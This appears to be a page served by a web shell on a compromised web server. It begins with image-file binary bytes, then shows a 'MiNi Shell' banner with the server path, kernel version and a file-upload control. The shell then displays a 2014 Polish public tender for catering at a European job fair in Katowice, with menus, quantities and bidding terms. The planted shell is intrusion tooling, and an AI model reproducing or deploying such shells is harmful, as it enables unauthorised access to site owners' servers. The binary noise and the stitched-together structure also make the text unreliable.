JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140902/187413-N-2014.html

<p class="kh_header"><b>Katowice: ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ PODCZAS EUROPEJSKICH TARGÓW PRACY, PRZEDSIĘBIORCZOŚCI I EDUKACJI</b><br>
<b>Numer ogłoszenia: 187413 - 2014; data zamieszczenia: 02.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu wojewódzctwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ PODCZAS EUROPEJSKICH TARGÓW PRACY, PRZEDSIĘBIORCZOŚCI I EDUKACJI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I									 
Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 250 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w KATOWICACH w dniu 9 października 2014 r. 
Na usługę składać się będą:
1. Napoje: 
- kawa: wysokogatunkowa, rozpuszczalna do samodzielnego przygotowania (500 saszetek x 2 g), 
- herbata: wysokogatunkowa, ekspresowa (min. 3 rodzaje: czarna, owocowa, zielona), wykładana 
w drewnianych pudełkach do samodzielnego przygotowania (łącznie 500 torebek herbaty z zawieszką 
x 2 g, w tym 250 torebek herbaty czarnej), 
- dodatki: cukier, cytryna w plasterkach, mleczko skondensowane (7%) lub śmietanka - bez ograniczeń,   
- wrzątek podawany w termosach lub warnikach (min. 5 sztuk) - bez ograniczeń,
- woda mineralna niegazowana (80 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (80 butelek plastikowych o pojemności 500 ml), 
- soki : pomarańczowy (120 porcji x 200 ml), jabłkowy (120 porcji x 200 ml), z czarnej porzeczki (120 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 500 sztuk):
- z zieloną sałatą, szynką i pomidorkiem (100 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (100 szt. x 40 g),
- z pastą jajeczno-szczypiorkową i świeżymi warzywami (100 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (100 szt. x 40 g); 
- z serem żółtym i oliwkami (100 szt. x 40 g);
3. Świeże owoce podawane na paterach:
- banany - 2 kg
- winogrona (zielone, czarne) - łącznie 2 kg
- mandarynki - 2 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (150 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (150 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) łącznie 6 kg, podawane na szklanych, metalowych lub porcelanowych paterach,  

5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (50 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (50 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (50 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (50 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 200 szt.)
6. Sałatki - 2 rodzaje:
- sałatka ryżowa z tuńczykiem i oliwkami - dziki ryż, tuńczyk, kukurydza, czarne oliwki (120 porcji 
x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (120 porcji x 100 g),
7. Ciepły posiłek podany w podgrzewaczach:
- żurek staropolski z jajkiem i kiełbasą (120 porcji x 400 ml),
- barszcz czerwony (120 porcji x 250 ml),
- krokiety z kapustą i grzybami (120 porcji x min. 130 g)
- pieczywo mieszane - białe, ciemne (bez ograniczeń). 

8. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
9. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
10. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
11. Transport. 

Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów - budynku Śląskiego Urzędu Wojewódzkiego mieszczącego się przy ul. Jagiellońskiej 25 w Katowicach (Sala Szara, I piętro).
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5), sałatki (poz. 6) i ciepły posiłek podawany w podgrzewaczach (poz. 7) powinny zostać dostarczone na godz. 12:00. 
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 100 butelek (500 ml) wody mineralnej gazowanej,
- 130 butelek (500 ml) wody mineralnej niegazowanej,
- 250 kubeczków jednorazowych,
- herbatniki typu petit beurre (100 opakowań po min. 100g).
Wyżej wymienione produkty należy dostarczyć do godz. 8:00 i rozłożyć na stoiskach do godz. 9:00 według wskazówek wyznaczonego pracownika WUP. 

Część II									 
Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 80 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w CZĘSTOCHOWIE w dniu 09.10.2014 r. 
Na usługę składać się będą:
1. Napoje: 
- kawa: wysokogatunkowa, rozpuszczalna do samodzielnego przygotowania (160 saszetek o wadze 2gr), 
- herbata: wysokogatunkowa, ekspresowa (min. 3 rodzaje: czarna, owocowa, zielona), wykładana 
w drewnianych pudełkach do samodzielnego przygotowania (łącznie 160 torebek herbaty z zawieszką 
o wadze 2gr., w tym 80 torebek herbaty czarnej), 
- dodatki: cukier, cytryna w plasterkach, mleczko skondensowane (7%) lub śmietanka - bez ograniczeń,   
- wrzątek podawany w termosach lub warnikach (min. 3 sztuki) - bez ograniczeń,
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 160 sztuk):
- z zieloną sałatą, szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczno-szczypiorkową i świeżymi warzywami (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
3. Świeże owoce podawane na paterach:
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 2 kg
- mandarynki - 1,5 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) łącznie 3 kg, podawana na szklanych, metalowych lub porcelanowych paterach.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)
6. Sałatki - 2 rodzaje:
- sałatka ryżowa z tuńczykiem i oliwkami - dziki ryż, tuńczyk, kukurydza, czarne oliwki (40 porcji x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (40 porcji x 100 g),

7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
10. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów w Częstochowie do godz. 9:00, dokładny adres dostarczenia zostanie przekazany Wykonawcy w dniu podpisania umowy.  
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- herbatniki typu petit beurre (40 opakowań po min. 100g).
Wyżej wymienione produkty należy dostarczyć do godz. 8:00 i rozłożyć na stoiskach do godz. 9:00 według wskazówek wyznaczonego pracownika WUP. 
Część III								 
Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 80 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w BIELSKU - BIAŁEJ w dniu 09.10.2014 r. 
Na usługę składać się będą:
1. Napoje: 
- kawa: wysokogatunkowa, rozpuszczalna do samodzielnego przygotowania (160 saszetek o wadze 2gr), 
- herbata: wysokogatunkowa, ekspresowa (min. 3 rodzaje: czarna, owocowa, zielona), wykładana 
w drewnianych pudełkach do samodzielnego przygotowania (łącznie 160 torebek herbaty z zawieszką 
o wadze 2gr., w tym 80 torebek herbaty czarnej), 
- dodatki: cukier, cytryna w plasterkach, mleczko skondensowane (7%) lub śmietanka - bez ograniczeń,   
- wrzątek podawany w termosach lub warnikach (min. 3 sztuki) - bez ograniczeń,
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 160 sztuk):
- z zieloną sałatą, szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczno-szczypiorkową i świeżymi warzywami (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
3. Świeże owoce podawane na paterach:
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 2 kg
- mandarynki - 1,5 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) łącznie 3 kg, podawana na szklanych, metalowych lub porcelanowych paterach.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)

6. Sałatki - 2 rodzaje:
- sałatka ryżowa z tuńczykiem i oliwkami - dziki ryż, tuńczyk, kukurydza, czarne oliwki (50 porcji x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (50 porcji x 100 g),

7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
10. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów w Bielsku-Białej do godz. 9:00, dokładny adres dostarczenia zostanie przekazany Wykonawcy w dniu podpisania umowy.  
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- herbatniki typu petit beurre (30 opakowań po min. 100g).
Wyżej wymienione produkty należy dostarczyć do godz. 8:00 i rozłożyć na stoiskach do godz. 9:00 według wskazówek wyznaczonego pracownika WUP. 

Część IV								 
Przedmiotem zamówienia jest świadczenie usługi restauracyjnej (kolacji) w formie bufetu szwedzkiego według skróconego menu wydanej w restauracji, którą zapewni Wykonawca, w dniu 09.10.2014 r. od godz. 18:00. dla 28 zagranicznych gości i wystawców biorących udział w Europejskich Targach Pracy, Przedsiębiorczości i Edukacji w Katowicach oraz przedstawicieli organizatora. 
Liczba uczestników: nie mniej niż 18 osób oraz nie więcej niż 28 osób. Ostateczna liczba uczestników zostanie przekazana Wykonawcy na 2 dni robocze przed wykonaniem usługi. 
Usługa restauracyjna (kolacja) wydana w formie bufetu szwedzkiego lub kolacji zasiadanej według skróconego menu (do ustalenia z wyłonionym Wykonawcą).
Restauracja powinna:
- być zlokalizowana w sąsiedztwie siedziby Zamawiającego i miejsca odbywania Targów, rozumianym jako obszar ograniczony następującymi ulicami: 
od północy, ulicą Andrzeja od skrzyżowania z ulica Mikołowską, następnie ulicą T. Kościuszki przechodzącą w ulicę M. Konopnickiej i ulicą Wojewódzką do skrzyżowania z ulicą J. Lompy, 
od wschodu, ulicą J. Lompy od skrzyżowania z ulicą Wojewódzką do wjazdu na Aleję Górnośląską,  
od południa, Aleją Górnośląską od wjazdu od strony ulicy Lompy do skrzyżowania z ulicą Mikołowską, 
od zachodu, ulicą Mikołowską od skrzyżowania z Aleją Górnośląską do skrzyżowania z ulicą Andrzeja, 
ORAZ
 od północy, ulicą Warszawską od skrzyżowania z ulicą Rynek do skrzyżowania z ulicą Andrzeja Mielęckiego,
 od wschodu, ulicą Andrzeja Mielęckiego od skrzyżowania z ulicą Warszawską do skrzyżowania 
z ulicą Dworcową i ulicą Tadeusza Kościuszki. 
 od południa, ulicą Dworcową od skrzyżowania z ulicą świętego Jana i ulicą Tadeusza Kościuszki do skrzyżowania z ulicą Andrzeja Mielęckiego,
od zachodu, od skrzyżowania z ulicą Tadeusza Kościuszki i ulicą Dworcową wzdłuż ulicy świętego Jana przechodzącej w ul. Rynek do skrzyżowania z ulicą Warszawską.

- dysponować wyodrębnioną salą zdolną pomieścić  28 gości, która będzie udostępniona do wyłącznej dyspozycji Zamawiającego w dniu 09.10.2014 r. od godz. 18:00 do ok. godz. 23:00. 

Na usługę składać się będą:
- 3 rodzaje przystawek (pieczarki faszerowane z szynką lub ziołami, carpaccio z polędwicy wołowej lub łososia, paluszki serowe panierowane z sosem musztardowo-miodowym), 
- 2 rodzaje zup (cebulowa z grzankami i serem, krem z borowików), 
- 3 dania główne (kieszonka z kurczaka nadziewana serem, makaron penne ze szpinakiem 
i suszonymi pomidorami, dorsz w koszulce z masłem koperkowym),
- dodatki: grillowane warzywa (bakłażan, cukinia, marchew, cebula, papryka), zestaw surówek, ryż, zapiekane ziemniaki, 
- deser: ciasto domowe z owocami, świeże owoce, 
- napoje: woda mineralna, soki (jabłkowy, z czarnej porzeczki), kawa, herbata, 1 lampka wina na osobę, 
- obsługa kelnerska przez cały czas trwania kolacji, przy czym przynajmniej jedna osoba z obsługi kelnerskiej powinno posługiwać się językiem angielskim w stopniu przynajmniej komunikatywnym.     

Przez restaurację Zamawiający rozumie: lokal gastronomiczny  świadczący na co dzień na miejscu usługę restauracyjną dla gości na indywidualne zamówienie według karty menu przy stolikach 
z obsługą kelnerską (Zamawiający wyklucza organizację kolacji w lokalach typu: restauracja samoobsługowa, stołówka, bar, bistro, Fast food, kawiarnia, pub, klub, dyskoteka, catering oraz lokale gastronomiczne specjalizujące się w jednym rodzaju dań np. pizzerie, pierogarnie). 

Wykonawca musi posiadać odpowiednie zaplecze techniczne i sanitarne oraz toalety dla gości. Ponadto Wykonawca powinien zapewnić odpowiedni wystrój sali (dekoracje stołów, obrusy materiałowe, dopasowane serwetki papierowe, muzyka w tle, lampy-świece). Ustawienie stołów zostanie ustalone z wyłonionym Wykonawcą..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 305- Zespół ds. Zamówień Publicznych, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2014 godzina 11:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część I,II,III oraz IV w ramach grantu EURES 2013/2014.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 250 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w KATOWICACH w dniu 9 października 2014 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (łącznie 250 osób) podczas Europejskich Targów Pracy, Przedsiębiorczości i Edukacji w KATOWICACH w dniu 9 października 2014 r. 
Na usługę składać się będą:
1. Napoje: 
- kawa: wysokogatunkowa, rozpuszczalna do samodzielnego przygotowania (500 saszetek x 2 g), 
- herbata: wysokogatunkowa, ekspresowa (min. 3 rodzaje: czarna, owocowa, zielona), wykładana 
w drewnianych pudełkach do samodzielnego przygotowania (łącznie 500 torebek herbaty z zawieszką 
x 2 g, w tym 250 torebek herbaty czarnej), 
- dodatki: cukier, cytryna w plasterkach, mleczko skondensowane (7%) lub śmietanka - bez ograniczeń,   
- wrzątek podawany w termosach lub warnikach (min. 5 sztuk) - bez ograniczeń,
- woda mineralna niegazowana (80 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (80 butelek plastikowych o pojemności 500 ml), 
- soki : pomarańczowy (120 porcji x 200 ml), jabłkowy (120 porcji x 200 ml), z czarnej porzeczki (120 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 500 sztuk):
- z zieloną sałatą, szynką i pomidorkiem (100 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (100 szt. x 40 g),
- z pastą jajeczno-szczypiorkową i świeżymi warzywami (100 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (100 szt. x 40 g); 
